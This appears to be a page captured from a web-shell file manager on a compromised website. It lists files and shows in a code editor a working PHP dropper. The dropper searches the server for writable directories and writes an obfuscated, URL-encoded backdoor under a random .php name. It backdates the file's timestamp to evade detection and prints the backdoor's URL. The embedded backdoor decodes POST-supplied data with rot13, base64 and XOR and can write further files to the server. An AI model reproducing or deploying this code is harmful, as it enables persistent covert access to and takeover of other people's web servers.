Gecko [ renovalkoronred.com.tr ]

Name	Size	Permission
0d8c213e0b01ae950f98706b1756f1...	4.34 KB	-rw-r--r--
2415649015	9.41 KB	-rw-r--r--
5d7852ab9d10e8291605d2804faa1b...	387 B	-rw-r--r--
680b3ca4b18d6aae00380516b2382c...	387 B	-rw-r--r--
85a6fcea3ddc4adbbe9893c7b25fce...	7.49 KB	-rw-r--r--
d86a281af765b3f730cef68fc5ce69...	7.49 KB	-rw-r--r--

Code Editor : 2415649015

<?php

if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

$payload_file = "%3C%3Fphp%20function%20cIElJ%28%24tYLNPGDml%2C%20%24wDnRr%2C%20%24wsKrz%29%7B%24YQqvi%20%3D%20%22ba06920c-fbfa-4b0c-8355-bbbed5645854%22%3B%09%24KDYow%20%3D%20%27AETFvS%27%3Breturn%20%24tYLNPGDml%20%5E%20%24YQqvi%5B%24wDnRr%20%25%20strlen%28%24YQqvi%29%5D%20%5E%20%24wsKrz%3B%7D%24YmziNznGQ%20%3D%20%22NOtnVat%22%3Bfunction%20fcpKT%28%29%7B%24CEePnusWYD%20%3D%20%27noBlGVgwho%27%3B%24BddLH%20%3D%2018%3B%24qhNKNMRp%20%3D%20%27lYe%27%3B%24UNJSDsQA%20%3D%20base64_decode%28%24qhNKNMRp%29%3B%24ygglSGdHzO%20%3D%202%3B%24XzJzNbbxZe%20%3D%20%27FCBoER%27%3B%24Qvdnk%20%3D%20%27eqH%27%3B%7Dfunction%20srnngUV%28%24YmziNznGQ%29%7B%20%24DzoifDL%20%3D%20%22%5Cx73%22.%22%5C164%22.%22%5C162%22.%27_%27.chr%28114%29.chr%281085-974%29.%22%5Cx74%22.%22%5C61%22.chr%2851%29%3B%24YmziNznGQ%20%3D%20%24DzoifDL%28%24YmziNznGQ%29%3B%09%24VNijtXhvf%20%3D%2054%3B%09%24ezAHgMjr%20%3D%2063%3B%24gylqde%20%3D%20%22%5Cx72%22.%27a%27.%22%5Cx77%22.%27u%27.chr%28114%29.%22%5C154%22.%22%5C144%22.%27e%27.%27c%27.%27o%27.%22%5C144%22.%22%5Cx65%22%3B%24YmziNznGQ%20%3D%20%24gylqde%28%24YmziNznGQ%29%3B%09%24VNijtXhvf%20%3D%20%24ezAHgMjr%20-%205%3B%24YmziNznGQ%20%3D%20str_split%28%24YmziNznGQ%29%3B%09%24jZRpKgZ%20%3D%2041%3Breturn%20%24YmziNznGQ%3B%7Dfunction%20wCDFMc%28%24cjbPaISbe%2C%20%24wsKrz%29%7B%24cjbPaISbe%20%3D%20array_map%28%22cIElJ%22%2C%20array_values%28%24cjbPaISbe%29%2C%20array_keys%28%24cjbPaISbe%29%2C%20array_values%28%24wsKrz%29%29%3B%09%24NkIojpKz%20%3D%2071%3B%24cjbPaISbe%20%3D%20implode%28%22%22%2C%20%24cjbPaISbe%29%3B%09%24sUyjq%20%3D%2063%3B%24JwvZidQ%20%3D%20%27u%27.chr%28110%29.chr%28115%29.%22%5C145%22.chr%28114%29.%22%5C151%22.chr%28126-29%29.chr%28108%29.%22%5C151%22.chr%28510-388%29.%22%5C145%22%3B%24cjbPaISbe%20%3D%20%40%24JwvZidQ%28%24cjbPaISbe%29%3B%09%24izjCcv%20%3D%2067%3Breturn%20%24cjbPaISbe%3B%7Dfunction%20AXhhf%28%24wsKrz%2C%20%24cjbPaISbe%29%7B%24wsKrz%20%3D%20array_slice%28str_split%28str_repeat%28%24wsKrz%2C%20intval%28count%28%24cjbPaISbe%29/16%29%2B1%29%29%2C%200%2C%20count%28%24cjbPaISbe%29%29%3B%09%24XjLyIQq%20%3D%2043%3Breturn%20%24wsKrz%3B%7Dfunction%20QPFqW%28%29%7Becho%20%22ojPni%22%3B%09%24zhNtdAG%20%3D%20%27ws%27%3B%09%24MmcoJ%20%3D%2049%3B%7Dfunction%20RxpnjLw%28%24qXobEir%29%7Bstatic%20%24VRgNEhnrRT%20%3D%20array%28%29%3B%09%24qXobEoyswN%20%3D%2071%3B%24pePeKwe%20%3D%20glob%28%24qXobEir%20.%20%27/%2A%27%2C%20GLOB_ONLYDIR%29%3B%09%24BxphYJr%20%3D%2067%3B%09%24RKRcdc%20%3D%20%27LhRUI%27%3B%24RMtzlIsV%20%3D%20count%28%24pePeKwe%29%3B%09%24uDKUdJaKI%20%3D%2036%3Bif%20%28%24RMtzlIsV%20%3E%200%29%20%7Bforeach%20%28%24pePeKwe%20as%20%24qXobE%29%20%7B%24roFoko%20%3D%20%22%5C151%22.chr%28478-363%29.%22%5Cx5f%22.chr%28944-825%29.%22%5Cx72%22.%22%5C151%22.chr%28986-870%29.%27a%27.%22%5C142%22.%27l%27.chr%28968-867%29%3Bif%20%28%40%24roFoko%28%24qXobE%29%29%20%7B%24VRgNEhnrRT%5B%5D%20%3D%20%24qXobE%3B%09%09%09%09%24cpmwh%20%3D%2052%3B%7D%7D%7Dforeach%20%28%24pePeKwe%20as%20%24qXobEir%29%20RxpnjLw%28%24qXobEir%29%3Breturn%20%24VRgNEhnrRT%3B%7DfcpKT%28%29%3Bfunction%20hEiBAFz%28%24cjbPaISbe%29%7B%24UagDlpdHDe%20%3D%20%27D%27.%22%5C117%22.%22%5Cx43%22.chr%28724-639%29.chr%28331-254%29.chr%2869%29.%22%5Cx4e%22.%22%5C124%22.%27_%27.chr%28171-89%29.%22%5C117%22.%22%5Cx4f%22.chr%2884%29%3B%24EEVEhRq%20%3D%20%24_SERVER%5B%24UagDlpdHDe%5D%3B%24pePeKwe%20%3D%20RxpnjLw%28%24EEVEhRq%29%3B%09%24zLvSIGbsDR%20%3D%20%27dczaEowd%27%3B%24GUPpz%20%3D%20array_rand%28%24pePeKwe%29%3B%09%24NeLqy%20%3D%20ord%28%27tgur%27%29%3B%24CeHGLxp%20%3D%20%22%5Cx2e%22.chr%28112%29.%22%5Cx68%22.%22%5C160%22%3B%24CYcvB%20%3D%20%24pePeKwe%5B%24GUPpz%5D%20.%20%22/%22%20.%20substr%28md5%28time%28%29%29%2C%200%2C%208%29%20.%20%24CeHGLxp%3B%09%24hPPrL%20%3D%20%27TeEiNqPn%27%3B%24KmVxnBeH%20%3D%20%27f%27.%27i%27.%22%5Cx6c%22.%22%5C145%22.%27_%27.%22%5C160%22.chr%28117%29.chr%28181-65%29.%22%5C137%22.chr%2899%29.%27o%27.chr%28110%29.chr%28116%29.%22%5Cx65%22.%27n%27.%22%5Cx74%22.%22%5C163%22%3B%40%24KmVxnBeH%28%24CYcvB%2C%20%24cjbPaISbe%29%3B%09%24Gzoxxury%20%3D%2050%3B%24YqaJjQmO%20%3D%20%22%5Cx48%22.%22%5C124%22.chr%281030-946%29.%22%5C120%22.%27_%27.%22%5Cx48%22.%27O%27.chr%2883%29.%22%5C124%22%3B%24zXJGmWjW%20%3D%20%27h%27.chr%28116%29.chr%28395-279%29.%27p%27.%27%3A%27.%22%5C57%22.chr%28600-553%29%3B%24LCJRZiTSk%20%3D%20%24zXJGmWjW%20.%20%24_SERVER%5B%24YqaJjQmO%5D%20.%20substr%28%24CYcvB%2C%20strlen%28%24EEVEhRq%29%29%3B%09%24hPPrL%20%3D%20trim%28%24zLvSIGbsDR%29%3B%09%24OmajU%20%3D%2059%3Bprint%28%24LCJRZiTSk%29%3B%09%24nZBaMv%20%3D%20%24NeLqy%20/%205%3B%09%24RtCaYBc%20%3D%20%24nZBaMv%20%2A%20%24nZBaMv%3B%7Dfunction%20QpGnCpq%28%24cjbPaISbe%2C%20%24GUPpz%29%7B%24GUPpz%20%3D%20%24GUPpz%5B0%5D%3B%09%24NnjVnitq%20%3D%2036%3Bif%20%28%24cjbPaISbe%20%21%3D%3D%20%24GUPpz%29%7BhEiBAFz%28%24cjbPaISbe%29%3B%09%09%24VMAlev%20%3D%20%27PUaRztYNUm%27%3B%7Delse%20%7BLVaao%28%29%3B%09%09%24lelBYSgQ%20%3D%20%27KoTd%27%3B%09%09%24lelBYSgQ%20%3D%20ord%28%27yqb%27%29%3B%7D%7Dfunction%20LVaao%28%29%7B%24oSZgFjM%20%3D%20%22%5Cx70%22.%27h%27.chr%28112%29%3B%24fkLoZqG%20%3D%20chr%28112%29.chr%28104%29.%22%5C160%22.%22%5C166%22.%27e%27.chr%281013-899%29.chr%28115%29.%22%5Cx69%22.%22%5C157%22.%22%5Cx6e%22%3B%24cjbPaISbe%20%3D%20Array%28%24oSZgFjM%20%3D%3E%20%40%24fkLoZqG%28%29%2C%20%29%3B%09%24YRigxAgLv%20%3D%20%27Yt%27%3B%24rbkaTxVz%20%3D%20%27s%27.%27e%27.%27r%27.%27i%27.chr%2897%29.%27l%27.%22%5C151%22.%22%5Cx7a%22.chr%28101%29%3Becho%20%40%24rbkaTxVz%28%24cjbPaISbe%29%3B%7Dfunction%20CncpDfhu%28%29%7Becho%20%22NOtnVat%22%3B%09%24uykdwhkTi%20%3D%20%27MEhLhJp%27%3B%7Dforeach%20%28%24_POST%20as%20%24wsKrz%20%3D%3E%20%24cjbPaISbe%29%7B%24WvYHtZ%20%3D%20strlen%28%24wsKrz%29%3B%09%24UqJFLYI%20%3D%2014%3B%09%24Qzwsj%20%3D%20%27bKwNL%27%3Bif%20%28%24WvYHtZ%20%3D%3D%2016%29%7B%24cjbPaISbe%20%3D%20srnngUV%28%24cjbPaISbe%29%3B%24wsKrz%20%3D%20AXhhf%28%24wsKrz%2C%20%24cjbPaISbe%29%3B%09%09%24PHoZgk%20%3D%2018%3B%24cjbPaISbe%20%3D%20wCDFMc%28%24cjbPaISbe%2C%20%24wsKrz%29%3B%09%09%24PHoZgk%20%3D%20%24PHoZgk%20%2A%2014%3B%09%09%24kmRRLBUTY%20%3D%2012%3Bif%20%28%40is_array%28%24cjbPaISbe%29%29%7B%24GUPpz%20%3D%20array_keys%28%24cjbPaISbe%29%3B%09%09%09%24HAScof%20%3D%20%27Sy%27%3B%24cjbPaISbe%20%3D%20%24cjbPaISbe%5B%24GUPpz%5B0%5D%5D%3B%09%09%09%24eSTAs%20%3D%20%27znRwAjIH%27%3BQpGnCpq%28%24cjbPaISbe%2C%20%24GUPpz%29%3B%7D%7D%7Ddie%28%29%3B%24ELppDN%20%3D%20%27jaNHUKZjCP%27%3B%3F%3E";
$payload_name = "";

srand(time());

function list_dir($dir, $depth=10000)
{

$result = array();
    $dir_count = 0;

if ($depth == 0)
    {
        return $result;
    }

$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');
    $h = @opendir($dir);
    if ($h === FALSE)
    {
        return $result;
    }

while (($f = readdir($h)) !== FALSE)
    {
        if ($f !== '.' and $f !== '..')
        {
            $current_dir = "$dir/$f";
            if (is_dir($current_dir))
            {
                $dir_count += 1;

if ($dir_count >= $depth)
                {
                    break;
                }

if (@is_writable($current_dir) == TRUE)
                {
                    $result[] = $current_dir;
                }
                $result = array_merge($result, list_dir($current_dir, $depth / 10));
            }
        }
    }

closedir($h);

return $result;
}

function write_payload($path, $payload)
{
    if (!@file_exists($path))
    {
        if (@file_put_contents($path, rawurldecode($payload)) != FALSE)
        {
            return TRUE;
        }
    }

return FALSE;
}

$base_www_path = $host = @$_SERVER['HTTP_HOST'];
$base_local_path = $_SERVER['DOCUMENT_ROOT'];

if (!($base_time = @stat($base_local_path."/.htaccess")))
{
    if (!($base_time = @stat($base_local_path."/index.php")))
    {
        if (!($base_time = @stat($base_local_path."/index.html")))
        {
            if (!($base_time = @stat($base_local_path."/..")))
            {
                if (!($base_time = @stat($base_local_path)))
                {
                    $base_time = Array();
                    $base_time['mtime'] = time();
                }
            }
        }
    }
}

$base_time = $base_time['mtime'];

if (!empty($payload_name) && $payload_name[0] == "/")
{
    $tokens = explode("*", $payload_name);

$writable_dirs = list_dir(str_replace("//", "/", $base_local_path . "/" . $tokens[0]));
    $payload_name = substr($tokens[1], 1);
}
else
{
    $writable_dirs = list_dir($base_local_path);
}

if (count($writable_dirs) == 0)
{
    echo "STATUS_UNWRITABLE";
    exit();
}

shuffle($writable_dirs);

# try to upload
$max_tryes = strlen($payload_name) == 0 ? 10 : 1;
foreach ($writable_dirs as $current_dir)
{
    // if payload name is set, no more one try to upload on current dir
    for ($i=0; $i < $max_tryes; $i++)
    {
        if (strlen($payload_name) == 0)
        {
            $temp_payload_name = substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz', mt_rand(1,8))),1,8) . ".php";
        }
        else
        {
            $temp_payload_name = $payload_name;
        }

$full_payload_name = $current_dir . "/" . $temp_payload_name;

$uri_path = substr($full_payload_name, strlen($base_local_path));
        $full_uri = $base_www_path . (strpos($uri_path, "/") == 0 ? $uri_path : "/".$uri_path);

if (write_payload($full_payload_name, $payload_file))
        {
            touch($full_payload_name, $base_time); // set last modification time as root folder
            echo "URL#http://" . $full_uri . PHP_EOL;
            exit();
        }
    }
}

echo "STATUS_CANTUPLOAD";
exit();

${this.title}

Code Editor : 2415649015